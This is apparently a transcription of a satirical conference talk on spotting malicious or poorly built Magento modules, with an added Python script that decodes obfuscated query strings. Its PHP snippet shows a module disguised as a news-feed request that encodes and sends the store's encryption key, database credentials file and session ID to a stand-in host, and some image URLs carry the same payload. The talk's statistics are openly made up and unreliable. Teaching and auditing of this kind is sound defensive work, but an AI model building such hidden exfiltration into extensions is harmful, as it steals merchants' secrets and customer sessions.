How to Build a Pure Evil Magento Module
Fabrizio Branca
Meet Magento 2015 – Leipzig, Germany

fbrnc

San Francisco, CA
Janine
Fiona
that’s me
Leo

Lake Tahoe, California

87.44%* of all modules (both paid and free) are known to be a major risk

*Note: Some statistics in this presentation may or may not be randomly made up based on wild guesses.

Goals
1. help you spot evil modules and avoid installing them
2. motivate vendors to rethink their “best practices”
3. make YOU write better modules

Disclaimer: Any Similarity to Persons (or Companies) Living or Dead Is Purely Coincidental

Okay, let’s get started:
How to Build a Pure Evil Magento Module
in 51 simple steps
7

Name
http://magename.me/
Mage Pro Gento

Security

http://example.com/news.xml

Annoying, huh?

http://example.com/news.xml?rlWgMKAmLJqyVwbvV09jMJ5Go3IlL2IFo2AeplRvsD%3Q%3Q

…and how do you feel about this?!

```php
// The slides build this expression up one field at a time, from version
// information to secrets. $sales is not defined on the slides.
$feedUrl = "http://example.com/news.xml?" . str_rot13(urlencode(base64_encode(json_encode(array(
    'module_version' => Mage::getConfig()->getModuleConfig("MageGento_Pro")->version,
    'magento_version' => Mage::getVersion(),
    'install_date' => Mage::getConfig()->getNode('global/install/date'),
    // business figures
    'lifetime_sales' => $sales->getLifetime(),
    'average_orders' => $sales->getAverage(),
    // encryption key, database credentials and the current session
    'crypt_key' => Mage::getConfig()->getNode('global/crypt/key'),
    'local.xml' => file_get_contents('app/etc/local.xml'),
    'session_id' => Mage::getSingleton('core/session')->getEncryptedSessionId()
)))));
```

You need to trust EVERY. SINGLE. LINE. you deploy to your server!
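Added example (not from the talk): the wrapping on the slides is encoding, not encryption, so anyone reviewing proxy or egress logs can reverse it and see what a module is sending. The Python below undoes the chain and flags the secret-bearing keys from the final slide; the function names, `SENSITIVE_KEYS` and every sample URL other than the slide's own query string are assumptions made for illustration.

```python
import base64
import codecs
import json
from urllib.parse import quote, unquote, urlsplit

# Keys from the final slide whose values must never leave the server.
SENSITIVE_KEYS = {"crypt_key", "local.xml", "session_id"}


def decode_query(query):
    """Undo str_rot13(urlencode(base64_encode(json_encode(...)))).

    Returns the decoded JSON object, or None if the query is not wrapped this way.
    """
    # Reverse order of the PHP chain: rot13 first (turns %3Q back into %3D),
    # then URL-decoding, then strict base64, then JSON.
    candidate = unquote(codecs.decode(query, "rot_13"))
    try:
        data = json.loads(base64.b64decode(candidate, validate=True).decode("utf-8"))
    except ValueError:  # covers binascii.Error, UnicodeDecodeError, JSONDecodeError
        return None
    return data if isinstance(data, dict) else None


def audit_urls(urls):
    """Return one finding per URL whose query string hides a JSON payload."""
    findings = []
    for url in urls:
        payload = decode_query(urlsplit(url).query)
        if payload is not None:
            findings.append({
                "endpoint": url.split("?", 1)[0],
                "keys": sorted(payload),
                "sensitive": sorted(SENSITIVE_KEYS.intersection(payload)),
            })
    return findings


def wrap(fields):
    """Build constructed test input with the same wrapping as the slides."""
    b64 = base64.b64encode(json.dumps(fields).encode("utf-8")).decode("ascii")
    return codecs.encode(quote(b64, safe=""), "rot_13")


SLIDE_QUERY = "rlWgMKAmLJqyVwbvV09jMJ5Go3IlL2IFo2AeplRvsD%3Q%3Q"  # from the slides
SAMPLE_URLS = [
    "http://example.com/news.xml?" + SLIDE_QUERY,
    # Constructed: same wrapping, carrying field names from the final slide.
    "http://example.com/news.xml?" + wrap({
        "module_version": "1.0.0",
        "crypt_key": "<placeholder>",
        "session_id": "<placeholder>",
    }),
    # Constructed: an ordinary query string that is not wrapped.
    "http://example.com/catalog?page=2",
]

if __name__ == "__main__":
    for finding in audit_urls(SAMPLE_URLS):
        print(finding)
```

A percent escape such as `%3Q`, whose second digit is not hexadecimal, is a quick visual tell that `str_rot13` was applied after `urlencode`.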

Average number of modules per Magento store
Launch: ~10
After 2 years: >100
https://twitter.com/ProductPaul/status/584393641575088128
Note: sample size may or may not be significant.

malicious vs vulnerable

Scalability Performance

Chances your module ends up on an installation with …
…more products than on your devbox: 73.25%
…a higher order volume than on your devbox: 80.77%
…more concurrent users than on your devbox: 98.53%

“Always do queries inside loops to support sales of full page cache extensions.”
http://meta.magento.stackexchange.com/questions/288/funny-useless-horrible-code-from-magento-extensions

Problem: Assume all instances share a file system

If your infrastructure looks more like this:

[Diagram: AWS production “Stack” (= Environment) built from “Layers” of app instances. Internet, Route 53, ELB; CloudFront for theme (JS/CSS,…) and media files; S3 for media files and build packages; Continuous Integration Pipeline (Jenkins); OpsWorks, CloudFormation, CloudWatch; Auto Scaling Group within an Availability Zone; Varnish Layer, Frontend Layer, Backend Layer, Worker Layer; Data Layer with Redis (sessions, cache backend, full page cache backend), RDS DB instance, RDS DB instance standby (Multi-AZ) and RDS DB read replica (for reports); SES for transactional emails; SQS queue; External Services (Fulfillment, DRM, Giftcards,…). ✓ marks components that are inherently fault tolerant.]

rather than this:

[Diagram: Internet]

then you most likely don’t have a shared file system

Please do not let your “configurable theme” dynamically generate skin files with custom CSS values.

How do you handle…
version control?
multi-server setups?
auto-scaling?
file permissions?

Code Quality

Don’t mess with PHP
ini_set
display_errors
memory_limit
max_execution_time
shutdown_function
spl_autoload_register
…

Don’t mess with Magento
Rewrites of important classes
Overwrites
Core Hacks
Events
Framework behavior
Core Concepts
Compilation
…
…unless this is what your module is all about

```xml
<?xml version="1.0"?>
<config>
    <global>
        <events>
            <controller_action_predispatch>
                <observers>
                    <magegento_pro_license_check>
                        <class>magegento_pro/observer</class>
                        <method>licenseCheck</method>
                    </magegento_pro_license_check>
                    <magegento_pro_update_check>
                        <class>magegento_pro/observer</class>
                        <method>updateCheck</method>
                    </magegento_pro_update_check>
                </observers>
            </controller_action_predispatch>
        </events>
    </global>
</config>
```

Be readable

Be specific

```php
foreach ($collection as $product) {
    /* @var $product Mage_Core_Model_Product */
    ...
}
```

Don’t be fancy

```php
!is_null($adminKey) && $adminKey != '' && $request['auth']['admin_key'] = $adminKey;
```

I don’t always test my code.
But when I do I do it on production.

Testcases?
That’s only for over-achievers!

Jenkins: Use Jenkins to implement a full deployment pipeline for your projects!
Travis CI: Test our Open Source Magento modules with Travis CI!

Dependencies
PHP version & extensions
3rd party libraries
3rd party services
other Magento modules

1. Avoid Dependencies
2. Declare Dependencies
any dependency increases the complexity significantly

Teacher Syndrome*
*http://www.urbandictionary.com/define.php?term=Teacher+Syndrome

http://example.com/logo.gif?rlWgMKAmLJqyVwbvV09jMJ5Go3IlL2IFo2AeplRvsD%3Q%3Q

http://example.com/clear.gif?rlWgMKAmLJqyVwbvV09jMJ5Go3IlL2IFo2AeplRvsD%3Q%3Q

app/etc/modules/ZZZ_MageGento_Pro.xml

Installation Support

[Diagram: Module Installation, from “discover” to “use”. Labels: The Right Thing™ (code review, add modman, add composer, git, integrate, test, deploy); download, upload “Step 1”, upload “Step 2”, clear caches; pay $xx to author, provide FTP access; one-click install; “good luck with that!”; “seriously?!”]

You need to trust EVERY. SINGLE. LINE. you deploy to your server!

How do you handle…
version control?
multi-server setups?
auto-scaling?
file permissions?

Transparency

Find your sweet spot
GitHub ↔ ionCube

https://twitter.com/benmarks/status/593807195768127488

[Chart: Forecast. Labels: “risk a new module crashes your store”, “developer happiness”]

Chances a speaker begins his answer with “That’s a great question!” (...even if the question wasn’t that great.)
USA: 78.84%
Europe: 23.47%
http://freakonomics.com/2015/01/15/thats-a-great-question-a-new-freakonomics-radio-podcast/

Thank you!
http://www.aoe.com
My blog: http://fbrnc.net
Follow me on twitter! @fbrnc